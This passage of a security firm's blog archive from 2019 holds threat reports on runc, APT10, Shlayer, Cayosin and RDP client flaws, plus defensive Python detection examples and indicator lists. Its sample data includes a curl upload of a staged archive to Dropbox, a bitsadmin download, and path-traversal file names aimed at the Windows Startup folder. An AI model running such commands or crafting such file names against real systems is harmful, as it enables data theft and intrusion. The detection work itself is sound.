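    """Extract the User-Agent content match and its modifiers from each rule line."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.search(line)
        if not m:
            continue
        opts = m.group("opts")
        depth = re.search(r"depth:(\d+)", opts)
        rules.append({
            "sid": int(m.group("sid")),
            "msg": m.group("msg"),
            "ua": m.group("content"),
            "nocase": "nocase;" in opts,
            "depth": int(depth.group(1)) if depth else None,
            # isdataat:!1,relative: not a single byte may follow the match
            "nothing_after": "isdataat:!1,relative;" in opts,
        })
    return rules

def ua_matches(rule, user_agent):
    """Apply content + nocase + depth + isdataat:!1,relative to one UA header value."""
    needle, hay = rule["ua"], user_agent
    if rule["nocase"]:
        needle, hay = needle.lower(), hay.lower()
    # depth:N bounds the match to the first N bytes of the buffer
    window = hay if rule["depth"] is None else hay[:rule["depth"]]
    pos = window.find(needle)
    if pos < 0:
        return False
    if rule["nothing_after"] and len(hay) > pos + len(needle):
        return False
    return True

# Constructed HTTP records in the shape of Suricata eve.json "http" events.
SAMPLE_HTTP = [
    {"src_ip": "10.0.0.5", "hostname": "203.0.113.10", "http_user_agent": "Solstice/2.0"},
    {"src_ip": "10.0.0.6", "hostname": "203.0.113.11", "http_user_agent": "solstice/2.0"},
    {"src_ip": "10.0.0.7", "hostname": "203.0.113.12", "http_user_agent": "Solstice/2.0 (compatible)"},
    {"src_ip": "10.0.0.8", "hostname": "www.example.com", "http_user_agent": "Mozilla/5.0 (Windows NT 10.0) xd/2.0"},
    {"src_ip": "10.0.0.9", "hostname": "203.0.113.13", "http_user_agent": "xd/2.0"},
]

def scan(records, rules):
    """Return (src_ip, sid) for every record whose User-Agent a rule would fire on."""
    hits = []
    for rec in records:
        for rule in rules:
            if ua_matches(rule, rec["http_user_agent"]):
                hits.append((rec["src_ip"], rule["sid"]))
    return hits

if __name__ == "__main__":
    for src, sid in scan(SAMPLE_HTTP, parse_rules(RULES)):
        print(f"{src} -> sid {sid}")
```

Only the first, second and fifth records fire: the third has trailing data after the string, and the fourth has the string outside the depth window. If you ever want the looser behaviour (match anywhere in the UA), drop the depth and isdataat options, but expect more false positives from legitimate agents that embed product tokens.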

Spreading the flock culture

on February 19, 2019

Cybersecurity is a quickly evolving industry and is expected to grow to USD 300 billion by 2024. In such a rapidly progressing industry you find new players emerging, one of which is Perch – Perch Security (read with James Bond voice). Although the company is new to the industry, our star-studded lineup is far from it. Our CEO alone has a background in founding cybersecurity companies and in creating standards and compliance frameworks (including STIX), among many other contributions to the world of cybersecurity.

So, who is Perch?

Perch is your witty, cunning, and innovative cybersecurity company. We offer many things, among them a SOC, log aggregation, an IDS, and more. Perch is versatile and has the capability to serve multiple markets, including MSPs, enterprises, and SMBs.

At Perch we believe in being personable and speaking to you like a human (that’s right, a human). We also don’t believe in using buzzwords and fancy jargon, especially in an industry where terms are not yet well defined and can be convoluted. Therefore, we built a brand and product that is not only comprehensible, but also relatable.

Our staff is held to the same standard – if not higher. When you need customer service, we have an entire team dedicated to the success of your business. Our flock culture doesn’t just spread externally. Each flocker is full of Perchified goodness. Employees of Perch are expected to go beyond the norm and think outside of the box. By adopting this mindset, we are able to push the product further.

The core of Perch

Being relatable and personable are our top priorities. However, our main focus is customer care – not before the sale, no. AFTER the sale. We believe that happy customers drive a business forward. Without customers you have nothing. (Aka a good product doesn’t mean anything without a customer.) We have an entire team dedicated to customers, called our Customer Success team. Our Customer Success team is set up for – you guessed it – your success.

Not only are we built to help you succeed, we take your feedback and turn it into features. We make it our priority to always engage with our customers. We have many different ways to do this, whether it be through communicating with an employee, our monthly user meeting, on a call with a prospect – you name it.

Until next time

Whether you are a part of the flock or stumbled upon this blog via one of our clever Tweets, we hope you find Perch to be a helpful resource or even just a fun group (we prefer both). Stay up-to-date with the latest in cybersecurity via our blog. Follow the flock on social (LinkedIn, Twitter, and Facebook). Or reach out to us anyway you like (Slack, email, or phone).

Tampa Bay Tech Leaders

Perchy on February 15, 2019

Perch Security breaks the mold in just about every way. Their branding is charming and funny – a far departure from the usual techy, serious branding of other threat intelligence companies. We spent an hour with Aharon at Perch HQ and spoke candidly about cyber threats, talent, and our tech community here in lovely Tampa.

Discover the entire story.

Threat Report Thursday February 14th 2019

on February 14, 2019

Alright, what’s up this week? A feature of modern Intel chips opens the door for stealthy malware, container hosts beware because nothing is safe anymore, adware slays macOS Gatekeeper, and a new malware variant exploits your antivirus to steal data.

ROP-Roh, Shaggy

Researchers recently discovered a way to abuse Intel Software Guard eXtensions (SGX) enclaves to hide malicious code from security software. Intel SGX is a feature found in all modern Intel CPUs that allows developers to isolate applications in secure enclaves. Until now the only known attacks involving SGX enclaves were side-channel attacks that leaked the data being processed inside an enclave; this research turns the threat model around and shows that a malicious enclave can attack its own host application using return-oriented programming (ROP).

The enclave uses Intel Transactional Synchronization eXtensions (TSX) to probe the host’s address space (checking which pages are mapped and writable without triggering page faults or making syscalls), breaks the host’s ASLR, and then runs a ROP chain with the full privileges of the host process, which is far more than an enclave is normally entitled to. Researchers note that Intel SGX enclaves could be used as a place to hide undetectable malware.

The researchers released the implementations from the paper “Practical Enclave Malware with Intel SGX” in a GitHub repository. The repository consists of three parts: tap_claw, egghunter, and demo.

  • TAP + CLAW – Contains the Intel TSX-based primitives to check whether a page is mapped and writable without using syscalls.
  • Egg Hunter – Shows how to use TAP as egg hunter for classical exploits.
  • Demo – Uses TAP + CLAW inside a (malicious) Intel SGX enclave to break ASLR of the host application, create a ROP payload, and mount a simple PoC attack (e.g. create a file in the current directory).

RunC vulnerability Critical for Containers

runc is the command-line utility that spawns and runs containers. It is the default runtime underneath Docker, containerd, Podman, and CRI-O. A vulnerability in runc, tracked as CVE-2019-5736, allows a malicious container to overwrite the host’s runc binary (the exploit fires when runc is used to start or attach to that container) and gain root-level code execution on the host machine.

The container is vulnerable when its root user is the host’s root, that is, when user namespaces are not in use or the host’s root is mapped into the container’s user namespace. Researchers found approximately 4,000 exposed Docker daemons carrying the vulnerability. Users and organizations were advised to update to the latest releases to prevent any potential attacks. A proof-of-concept was posted on GitHub by user feexd on February 11, 2019. You might want to run this PoC on a host machine you can promptly throw in a flaming dumpster.
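Two host-side checks go naturally with patching this one, and the Python below is an added example rather than anything from the runc project or the advisory. The first reads the security options Docker reports (the input format, the output of docker info --format '{{.SecurityOptions}}' on Docker 18.x, is an assumption) to see whether user-namespace remapping is on, so that root in a container is not root on the host. The second records a SHA-256 baseline of the host runc binary and re-checks it later, since the footprint of a successful exploit is a modified runc. The file hashed here is a temporary stand-in for the real binary, constructed for the example.

```python
import hashlib
import hmac
import os
import tempfile

def userns_remap_enabled(security_options: str) -> bool:
    """True if 'name=userns' is among Docker's reported security options.
    Input: output of `docker info --format '{{.SecurityOptions}}'`, e.g.
    "[name=apparmor name=seccomp,profile=default name=userns]" (format assumed)."""
    entries = security_options.strip().strip("[]").split()
    return any(entry.split(",")[0] == "name=userns" for entry in entries)

def sha256_file(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()

def record_baseline(binary_path: str, baseline_path: str) -> str:
    """Store the digest of a known-good runc, taken right after installing the patched package."""
    digest = sha256_file(binary_path)
    with open(baseline_path, "w") as f:
        f.write(digest + "\n")
    return digest

def runc_unchanged(binary_path: str, baseline_path: str) -> bool:
    """Re-hash the live binary and compare it with the baseline in constant time."""
    with open(baseline_path) as f:
        expected = f.read().strip()
    return hmac.compare_digest(expected, sha256_file(binary_path))

def demo() -> tuple:
    """A temporary file stands in for /usr/bin/runc (constructed for the example):
    baseline it, then overwrite it the way the exploit does, and re-check."""
    workdir = tempfile.mkdtemp()
    runc = os.path.join(workdir, "runc")
    baseline = os.path.join(workdir, "runc.sha256")
    with open(runc, "wb") as f:
        f.write(b"\x7fELF...original patched runc bytes...")
    record_baseline(runc, baseline)
    before = runc_unchanged(runc, baseline)
    with open(runc, "wb") as f:  # container-controlled content lands here in the real attack
        f.write(b"#!/bin/sh\n# attacker-controlled replacement\n")
    after = runc_unchanged(runc, baseline)
    return before, after

if __name__ == "__main__":
    print("userns remap:", userns_remap_enabled("[name=apparmor name=seccomp,profile=default name=userns]"))
    print("baseline ok before / after tamper:", demo())
```

Keep the baseline file somewhere the container cannot reach (not on the host’s root filesystem next to runc), and re-run the check from cron or your EDR so a swapped binary is caught before the next docker exec turns it into host root.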

Shlayer slays macOS Gatekeeper to Run Unsigned Code

Carbon Black recently discovered “Shlayer” targeting macOS users and disabling the Gatekeeper protection to run unsigned second-stage payloads. Shlayer targets all macOS releases from 10.10.5 up to the latest 10.14.3 and arrives on the target machine signed with a legitimate Apple Developer ID, so the first stage passes Gatekeeper and looks trustworthy to the victim.

The threat actor has been using legitimate websites to redirect users to a fake Flash installer, so this is likely a malvertising campaign. Once the user runs the fake Flash installer, a malicious “.command” shell script is launched that downloads additional payloads. The final payload is adware, which gets to run on the compromised machine because Shlayer disables the Gatekeeper protection mechanism. Researchers released indicators of compromise on GitHub. We have checked these indicators for all Perch users over the last 30 days. While the indicators were seen, there was no sign that a Perch user has been infected by Shlayer. If you want to keep reading about Shlayer, check out this article.

Astaroth Exploits Avast to steal data

Security firm Cybereason recently discovered a new Astaroth Trojan campaign targeting Brazil and European countries that abuses legitimate antivirus software on the victim’s machine to steal information and load malicious modules. The campaign is phishing based, gained momentum towards the end of 2018, and has been identified in thousands of incidents. The infection starts with a .7zip archive delivered to the target as an email attachment or via a hyperlink.

Once executed, the malware connects to a C&C server and exfiltrates information about the infected computer. The last stage of the attack uses BITSAdmin to grab a payload from another C&C server. Cybereason also found that Astaroth abuses security tools already present on the host: it loads a malicious module through Avast’s “aswrundll.exe” to gather information on the compromised machine, and if Avast is not present it uses “unins000.exe”, part of a security solution developed by GAS Tecnologia, to collect personal user information without being detected. We checked all users over the last 30 days, and we saw no signs of compromise within any of our clients’ data related to the indicators of compromise released with this research. Although the revived campaign is currently targeting South America and Europe, it’s only a matter of time before the campaign pivots to North America. If you want to read more about Astaroth there is a great article here.

Lucky number 77 for Windows

On February 12, 2019, Microsoft released its monthly security update, which addresses 77 security flaws across a wide range of products, from Internet Explorer and Edge to the Azure IoT SDK. Among them is the IE zero-day tracked as CVE-2019-0676, which was disclosed as already being exploited in the wild; the flaw lets an attacker who gets a user to open a malicious page test for the presence of files on disk. Microsoft also fixed two vulnerabilities in its Server Message Block (SMB) implementation that can lead to remote code execution, a vulnerability in the DHCP Server component included with Windows Server, and the vulnerability known as PrivExchange. It is unclear at present whether the DHCP flaw has been used by cyber criminals in their operations, but it can compromise your DHCP server with a single packet. Users and organizations were advised to apply the update to address these vulnerabilities.


With all this talk of malware and browser exploits, you should check out Malwarebytes’ in-depth review of recent exploit kits used to attack browsers and install malware on end user machines.

Release Notes

February 12, 2019

  • App-wide organization picker
  • New navigation and app layout
  • Shared Perchybana dashboards and visualizations

  • Fix issues with SecurityEventAlert mixed IP types
  • Issues after intel migration
  • Fix links to Perchybana
  • Long sensor names can cause a 500
  • Fixed timeouts on user registration/new user creation
  • Restrict Custom date ranges to maximum of 90 days
  • Fix invite codes to use the organization chosen in the dropdown

Release Notes

February 7, 2019

  • MSSPs can now use Perch SLAs
  • Enhanced performance for Perchybana
  • Enabled Perchybana dashboards and visualizations

  • Stability and performance improvements

Threat Report Wednesday February 6th 2019

on February 6, 2019

This week we learn about APT10’s modus operandi in Operation Cloud Hopper, how U.S. Cyber Command plans to respond to such foreign campaigns, GoDaddy DNS server’s wild ride with GandCrab, and 16 major RDP vulnerabilities.

More details on Stone Panda’s (APT10) Cloud Hopper

A cyber-espionage campaign targeting at least three companies in the United States and Europe between November 2017 and September 2018 was brought to light in data published by Recorded Future and Rapid7. Based on the technical data discovered, they assess with high confidence that these incidents were conducted by APT10 (also known as Stone Panda or CVNX) in an effort to gain access to networks and steal valuable intellectual property or gain commercial advantage.

The targeted companies include:

  • Visma, an IT and business cloud services managed service provider (MSP)
  • An international apparel company
  • A U.S. law firm with strong experience in intellectual property law with clients in the pharmaceutical, technology, electronics, biomedical, and automotive sectors, among others

In all three incidents, the attackers gained access to networks through deployments of Citrix and LogMeIn remote-access software using stolen valid user credentials. We see once again how dangerous password reuse and/or lack of two factor authentication can be.

The attackers then enumerated access and conducted privilege escalation on the victim networks, utilizing DLL sideloading techniques documented in a US-CERT alert on APT10 to deliver malware.

APT10 Indictment

During the Visma intrusion, APT10 deployed RedLeaves malware with command and control (C2) communications encrypted using the RC4 and Salsa20 stream ciphers. On the two other victim networks, the attackers deployed a unique version of the UPPERCUT (ANEL) backdoor used only by APT10. The backdoor was delivered by abusing the Notepad++ updater to sideload a malicious DLL, as seen in APT10’s targeting of Japanese corporations in July 2018.

The attackers transferred malware and tooling from their C2 using BITSAdmin-scheduled tasks into the ‘C:\ProgramData\temp’ directory on the victim networks. APT10 actors then compressed proprietary data from Visma with WinRAR (deployed by the attackers) and exfiltrated to Dropbox using cURL. The same Dropbox account was accessed by the attackers during the apparel company intrusion. Dropbox was also used to store exfiltrated documents from the third victim, a U.S. law firm, with the files again exfiltrated using identical TTPs and uploaded using cURL for Windows.

APT10 is believed to be the most significant Chinese state-sponsored cyber threat to global corporations known to date. APT10 has run a number of operations since 2016, and we now know, from the U.S. indictment of two of its members, that the group works for the Chinese intelligence agency, the Ministry of State Security (MSS).

Utilizing actors working for shell companies such as Huaying Haitai Science and Technology Development Co Ltd, the MSS has conducted, “Operation Cloud Hopper,” against managed IT service providers (MSPs) designed to steal intellectual property and enable secondary attacks against their clients. Access to the networks of these third-party service providers grants the MSS the ability to potentially access the networks of hundreds, if not thousands, of corporations around the world. APT10 likely compromised Visma with the primary goal of enabling secondary intrusions onto their client networks, and not of stealing Visma intellectual property.

In all three incidents, APT10 actors used previously acquired legitimate credentials for initial access; in the law firm and apparel company cases, those credentials were possibly obtained through a third-party supply chain compromise.
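The tooling chain described above (BITSAdmin pulling files into C:\ProgramData\temp, WinRAR staging, cURL to Dropbox) is the kind of thing that is worth hunting for in process-creation telemetry even after the indicators themselves have aged out. The Python below is an added example, not from the Recorded Future or Rapid7 research: it classifies each process-creation event into a stage of that chain and flags hosts where more than one stage shows up. The event records are constructed for the example, and the field names (host, image, cmdline) follow a Sysmon Event ID 1 style export, which is an assumption rather than a format the report specifies.

```python
import ntpath
from collections import defaultdict

STAGING_DIR = "\\programdata\\temp\\"  # C:\ProgramData\temp, as named in the report
DROPBOX_HOSTS = ("dropbox.com", "dropboxapi.com", "dropboxusercontent.com")

# Constructed process-creation records (Sysmon Event ID 1 style fields; assumed layout).
SAMPLE_EVENTS = [
    {"host": "WS01", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer job1 http://203.0.113.5/a.dat C:\ProgramData\temp\a.dat"},
    {"host": "WS01", "image": r"C:\ProgramData\temp\rar.exe",
     "cmdline": r"rar.exe a -hpSecret C:\ProgramData\temp\out.rar D:\Shares\Projects"},
    {"host": "WS01", "image": r"C:\ProgramData\temp\curl.exe",
     "cmdline": r"curl.exe -X POST https://content.dropboxapi.com/2/files/upload --data-binary @C:\ProgramData\temp\out.rar"},
    {"host": "WS02", "image": r"C:\Program Files\WinRAR\WinRAR.exe",
     "cmdline": r"WinRAR.exe x C:\Users\bob\Downloads\drivers.rar"},
    {"host": "WS03", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer upd https://updates.example.com/p.msi C:\Users\alice\AppData\Local\Temp\p.msi"},
]

def classify_event(ev):
    """Map one process-creation event to a stage of the chain, or None if it looks benign."""
    image = ntpath.basename(ev["image"]).lower()   # ntpath so Windows paths parse on any OS
    image_dir = ev["image"].lower()
    cmd = ev["cmdline"].lower()
    # BITS transfer landing in the staging directory the actors used
    if image == "bitsadmin.exe" and "/transfer" in cmd and STAGING_DIR in cmd:
        return "bits_download_to_staging"
    # WinRAR/rar.exe either running from, or writing archives into, that directory
    if image in ("rar.exe", "winrar.exe") and (STAGING_DIR in image_dir or STAGING_DIR in cmd):
        return "rar_staging"
    # cURL for Windows talking to Dropbox endpoints
    if image == "curl.exe" and any(h in cmd for h in DROPBOX_HOSTS):
        return "curl_upload_to_dropbox"
    return None

def stages_by_host(events):
    """Collect the distinct stages seen per host."""
    seen = defaultdict(set)
    for ev in events:
        stage = classify_event(ev)
        if stage:
            seen[ev["host"]].add(stage)
    return dict(seen)

def flag_hosts(events, min_stages=2):
    """Hosts showing at least min_stages distinct stages; a single stage is a weaker lead."""
    return sorted(h for h, s in stages_by_host(events).items() if len(s) >= min_stages)

if __name__ == "__main__":
    for host, stages in stages_by_host(SAMPLE_EVENTS).items():
        print(host, sorted(stages))
    print("flagged:", flag_hosts(SAMPLE_EVENTS))
```

WS02 (WinRAR from Program Files on a download) and WS03 (a BITS transfer into a user temp directory) stay quiet on purpose: both are everyday activity, and the signal in the report is the combination of these tools with that one staging directory and a cloud storage upload, not any of them alone.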

Transformational hacking moment for U.S. Cyber Command

On February 6, 2019, RealClear published a report on a new, more aggressive strategy to take down the cyber actors behind high-profile attacks on the United States. The U.S. is no longer just playing defense.

Gen. Paul Nakasone, commander of U.S. Cyber Command, described a “transformational moment” in how the U.S. conducts cyber operations, aimed at raising the costs adversaries incur from attacking the United States. Nakasone did not reveal what the new strategy is; however, he stated that it involves targeting the infrastructure of adversary cyber actors, hurting their ability to target American interests in the virtual world. Nakasone referenced an operation against ISIS by Joint Task Force Ares that took down the group’s communications and propaganda tooling.

Nakasone also revealed a partnership between the U.S. Cyber Command and the NSA which helped to secure the 2018 midterm elections against Russian interference. U.S. Cyber Command learned that techniques and tradecraft must evolve to keep pace with adversaries. No indicators of compromise were released with the report.

GandCrab smash and grab with GoDaddy’s help

A large-scale GandCrab ransomware campaign was assisted by a security hole in GoDaddy’s DNS. GandCrab is a common ransomware family first seen in 2018. Researchers found that the attackers launched their attacks through the compromised DNS, ultimately delivering GandCrab ransomware to the targeted systems. Researchers disclosed two phishing email themes used in this campaign: DHL delivery notices and e-fax messages. We checked the last 30 days of data and saw a few organizations receive these emails. If you were affected, we have reached out to you.

Email domains

IP addresses

So many RDP vulnerabilities!

Check Point researchers have discovered 25 vulnerabilities, 16 of them rated critical, in commonly used Remote Desktop Protocol (RDP) clients (the open-source rdesktop and FreeRDP clients and Microsoft’s own Remote Desktop Connection) that would allow a malicious RDP server to reverse the usual direction of attack and infect the computer of the user connecting to it. From that foothold the attacker can move into that user’s network as a whole. And yes, our data confirms that many organizations still allow access to RDP from the outside world.

I can imagine a scenario where someone hijacks the DNS for your RDP servers and infects all the clients that try to connect. But this would be cool for a hack back honey pot too. Which reminds me of Wes’ blog post on forcing the pain back to the bad guys.

In one of the vulnerabilities (this one in Microsoft’s client), when using the “copy & paste” feature while connected to a malicious RDP server, the server can use the shared RDP clipboard to write files to locations of its choosing on the client’s computer, because the file names it supplies are not checked for path traversal.

As described by the research team, a potential attacker could use this vulnerability in the Remote Desktop Connection to drop arbitrary malicious scripts or programs to a user’s Startup folder, which would be automatically executed during the next reboot of the client computer.

This did not meet Microsoft’s bar for servicing, and no patch is planned. Check Point researchers recommend turning off clipboard sharing when connecting over RDP to any server you do not fully trust.
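The bug class here is simple to state and easy to reproduce in miniature: the clipboard file transfer hands the client a list of file names chosen by the server, and a client that joins those names onto its download directory without checking where the result lands can be made to write into the Startup folder. The Python below is an added example (not Check Point’s proof of concept or Microsoft’s code) that puts the naive join next to a checked one; it uses ntpath so that Windows path rules apply even when run on Linux, and the directory and file names are constructed for the example. Note that from the default Downloads folder a single “..” reaches the user’s profile, so the attacker does not even need to know the username.

```python
import ntpath

DOWNLOAD_DIR = r"C:\Users\victim\Downloads"
STARTUP_DIR = r"C:\Users\victim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"

def vulnerable_target(download_dir, name):
    """Joins whatever the server sent; '..' segments and absolute paths walk out of download_dir."""
    return ntpath.normpath(ntpath.join(download_dir, name))

def safe_target(download_dir, name):
    """Returns the destination only if it stays under download_dir, otherwise None."""
    root = ntpath.normpath(download_dir)
    candidate = ntpath.normpath(ntpath.join(root, name))
    try:
        inside = ntpath.commonpath([root, candidate]) == root
    except ValueError:  # different drive or a UNC path such as \\attacker\share\x
        inside = False
    return candidate if inside else None

# Constructed file names as a malicious RDP server could present them in one paste.
SERVER_FILE_NAMES = [
    "quarterly-report.pdf",
    r"..\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.bat",
    "../AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/update.vbs",
    r"\\attacker\share\payload.exe",
]

def triage(download_dir, names):
    """(name, where the naive client writes it, where the checked client writes it or None)."""
    return [(n, vulnerable_target(download_dir, n), safe_target(download_dir, n)) for n in names]

if __name__ == "__main__":
    for name, naive, checked in triage(DOWNLOAD_DIR, SERVER_FILE_NAMES):
        print(f"{name!r}\n  naive   -> {naive}\n  checked -> {checked}")
```

The commonpath check is deliberately done on the normalised result rather than by scanning the input for “..”: forward slashes, mixed separators and absolute or UNC names all collapse to the same question, does the final path still live under the directory the user agreed to receive files in.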

New Botnet Shows Evolution of Tech and Criminal Culture

Perchy on February 5, 2019

When botnet-as-a-service meets social media marketing, you have a threat poised to rapidly spread. That’s precisely what researchers have found in a quickly evolving botnet called Cayosin (Kay-OH-sin), which combines the most dangerous features of multiple previous botnets and makes them available to a broad audience at a low price.

Get the full story.

Threat Report Sunday February 3rd 2019

on February 3, 2019

Tragedy strikes! Cayosin Botnet combines Qbot and Mirai to cause Erradic behavior

Recently, we came across an emerging botnet-as-a-service, the Cayosin Botnet. We first observed Cayosin on January 6, 2019, and activity has been ramping up. We have data on 55 scanning IPs, with indicators consistent with the attacks built into Cayosin. Based on data from the threat actors, the bot count is over 1,100 as of February 2nd.


Cayosin appears to be created by Erradic, of RyM Tradgedy. Accounts (spots) for Cayosin Botnet are being sold via Instagram by @unholdable and @pumperdumper. A YouTube demo of Cayosin was posted two days after the scanning began. If you watch their Instagram stories, you can get frequent updates on Cayosin’s growth.

Instagram Conversation

Cayosin largely recycles exploits utilized by other botnets, like Mirai, though the injections reference a second stage binary hosted at 185.244.25[.]241 – an IP address not observed among the 55 IPs scanning with the first stage exploit.



Based on reverse engineering of the binaries that unixfreaxjp posted to Imgur, we understand that the codebase of Cayosin shares characteristics with Torlus/Qbot/Lizkebab. 185.244.25[.]241 was scanning, but primarily for open telnet services. 185.244.25[.]241 is a Netherlands VPS that is serving two binaries we recovered. Once the second stage infection is executed on a vulnerable host, the host will reach out to hostnamepxssy[.]club.

Perchybana Activity

On January 26, 2019, we saw a change in behavior and some of the IPs were scanning with a new user-agent, “Cock/2.0” instead of “Cayosin/2.0”. This change in behavior may have something to do with a customer service dispute that led to the source code of Cayosin being posted on pastebin. We were unable to find that pastebin post, but it could have prompted a new build of the botnet.

This is not the team’s first tool. They have created a few along the way like Summit, Tragic, and about a dozen others. You can learn more about these tools by following the various Instagram accounts of the crew. They seem interested in building tools to DDoS and boast about taking down services with OVH, Choopa, NFO – and if the hype is real, maybe even Rocket League servers.

User-Agents

  - Cayosin/2.0
  - Cock/2.0

First stage IPs

  - 101.255.95[.]34

  - 103.102.133[.]11

  - 103.113.156[.]46

  - 103.24.104[.]98

  - 103.62.152[.]58

  - 104.185.20[.]41

  - 113.11.154[.]162

  - 114.108.229[.]59

  - 115.127.103[.]132

  - 115.127.103[.]139

  - 115.127.5[.]244

  - 117.102.69[.]124

  - 117.102.69[.]125

  - 117.102.69[.]126

  - 118.97.55[.]101

  - 119.40.84[.]155

  - 119.73.133[.]87

  - 120.28.151[.]44

  - 120.29.125[.]194

  - 121.235.3[.]65

  - 121.7.226[.]57

  - 122.117.162[.]61

  - 122.144.11[.]195

  - 122.96.208[.]32

  - 125.165.180[.]211

  - 144.202.60[.]94

  - 152.169.218[.]80

  - 162.244.80[.]47

  - 162.244.81[.]232


  - 175.106.11[.]179

  - 176.152.38[.]195

  - 185.105.4[.]172

  - 185.105.4[.]183

  - 185.244.25[.]201

  - 190.6.141[.]59

  - 202.162.204[.]36

  - 202.86.222[.]4

  - 203.129.22[.]119

  - 203.160.63[.]125

  - 203.177.173[.]46

  - 219.74.127[.]169

  - 223.197.212[.]15

  - 36.37.220[.]57

  - 36.66.16[.]117

  - 36.89.106[.]19

  - 45.124.15[.]48

  - 46.8.209[.]105

  - 58.212.57[.]219

  - 65.127.187[.]7

  - 67.205.154[.]69

  - 74.93.73[.]169

  - 83.208.108[.]189

  - 85.197.162[.]91

  - 95.27.246[.]66

Second stage IP

  - 185.244.25[.]241

C2 Domain

  - hostnamepxssy[.]club

Binary info

cock.x86 (ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV))

md5 - 7cd9788dd9a5e97ca2e0a0480d4c377a

sha256 - e5173e4e4a1044858a14002a45507bb75772b21ceb348488bef465c2d22b791d

cock.mpsl (ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped)

md5 - 283d4888af0d820ba1d6f72e586a8410

sha256 - 96ecc0e9b9e6f4f0275c4041e128d5ee87b51148e0e74b0379ece5edebb22792

The Lesson of the Limping Lady

on January 31, 2019

What does any sane individual do when they find themselves on the losing side of a war? Look at any history book and the answer is quite evident: fight dirty. Cheap tricks, a punch 👊 below the belt – whatever it takes to claw back some advantage. And why shouldn’t a defender left with few options decide to fight nasty?

Indeed, the entire world of spycraft and sabotage was born through such events. Legends were made from stories such as the Trojan horse or Washington’s crossing of the Delaware.

Throughout World War II, and especially during the German advance through Europe, the Allies were bereft of options outside of sabotage or guerrilla warfare. And so, the Axis enemy got the dirty fight it was asking for: the proverbial kick to the ol’ manhood. By a woman. With a wooden prosthetic she affectionately named ‘Cuthbert’ ❤️.

I kid you not.

The story is so amazingly interesting and inspiring, when Tom Hanks turns this into the next hit war movie, just remember: you heard about it here first ☝️.

While there were many Allied resistance operators throughout the war, none were held in such contempt by the Nazis as Virginia Hall, known to Hitler’s henchmen as the “Limping Lady”. Or, as Klaus Barbie, the head honcho of the Gestapo in Lyon, called her: “that limping Canadian b—ch.” That poor bad guy sounds a little butthurt 🙃. So would you if you got “kicked” by a wooden Canadian prosthetic named Cuthbert.

Throughout Hall’s illustrious career, she was behind more sabotage missions, troop movement leaks, jailbreaks, and other nefarious deeds than any other spy in World War II history. Oh, and news flash to you Mr. Barbie: Hall wasn’t even Canadian. Which makes sense, because nobody doesn’t like a Canadian.

Are we losing the good fight?

The good fight

So, what does this have to do with cybersecurity? Just this: we seem to be fighting a war we aren’t winning. I won’t bore you with the statistics (💤). Go to any security conference keynote and you can hear the speaker wax long and elegant with all their beautiful bar chart wizardry.

But we know this: we aren’t winning. Our adversaries are on a constant onslaught from basic low-intelligence scams up to sophisticated nation-state threat actors. And we’ve paid a heavy toll for their misdeeds; namely – we’ve turned into mouse-chasing cats. As the old adage goes (which I’ve just now made up), where the mouse goes, so does the cat 🙀.

Unlike Virginia Hall, most of us are so heads down in responding and reacting to threats, we don’t ever take the time to look up and ask ourselves a simple question:

If the bad guys are so painful to us, how can I inflict pain back upon them? 💁

When you’re backed into a corner, that is the time to fight back. That’s how a fight gets dirty. And I’m not talking about hack-back. That was so 2014 era passé.

I’m talking about taking a page from Hall’s book. Ignore the rules of engagement for a minute and let’s go through a thought exercise. What can we do to make life hard for the bad guys that make life hard for us? While we may not be as brazen and bold as Hall, springing jailbreaks and sabotaging tanks, we can still think outside the box in some innovative ways. Here’s a few ideas that might strike your fancy. I’m going to call these Cuthbert’s Kicks, simply because Hall is such a BA and you better not mess with anyone who would name their artificial leg Cuthbert.

Cuthbert’s kick #1: Mule burning for fun and profit

Kick #1

I talked to an innovative banker one time who came up with an ingenious way of pushing major pain back onto his cyber miscreants. He once asked me, “Hey Wes, you know all those wire fraud scams that banks face, where a fraudulent email ‘from the CEO’ asks the CFO to send out a wire?”

Of course, I have. They have been a huge issue for years. Rather than simply ignoring the emails, this brilliant banker made the fight dirty. He actually responds back to the bad guy.

“We actually stood up an email account to reply back to the fraudster. We act like we’ve fallen for the bait and we’re going to initiate the wire. But in all actuality, we’re simply tricking him into giving up the wire instructions. In nearly every case, the wire account belongs to a money mule. We notify the other bank that holds that account for the mule so they can get the account shut down.”

Now this is an interesting way to make a fraudster angry – and worse, will truly sabotage their miscreant operation. The banker explains: “It takes months, and sometimes years for these fraudsters to build up their repertoire of mules. When we reply back and get the fraudster to expose their mules, we can burn those accounts and truly make life difficult for them. These bad guys fall for it every time, and it makes me so happy to know I’m truly fighting them back.” 🙌

Cuthbert’s kick #2: Feed that deep dank dark Web

Kick #2

The Dark Web is all abuzz these days. All the radio ads I hear tell me about how our PII are hiding in the ‘deep dark Web’ (shocker) ready for any seedy neckbeard in a fedora to gobble up. But when we deconstruct the hype, there is a healthy (can I call it that?) and active criminal market place with a supply chain for anything a cybercriminal might want. Shameless plug: I even made a video about it many years ago.

Now ask yourself this: Why do these bad guys use Tor? Simply this: the anonymity it provides. It’s an excellent place to sell your wares and pop off about what dark deeds ail you. Oh, and it’s also a great place for us to push some pain back to the baddies. Here’s one idea.

Did you know password dumps are often left on pastebin and dark Web forums? Why don’t we take advantage of that anonymity? One security practitioner I know does something innovative with it. “We occasionally like to feed a password dump into these places with fake credentials. Bad guys don’t know they’re fake. But we sure do – we created them after all.”

When pressed on why he does this, his response was one for the record books: “We wait for a few days and then search the SIEM for logins attempting to use these fake credentials. From there, we can cross-correlate for legitimate logs and hunt down compromised accounts.” Now that is some outside the box thinking if ever I’ve heard of one.
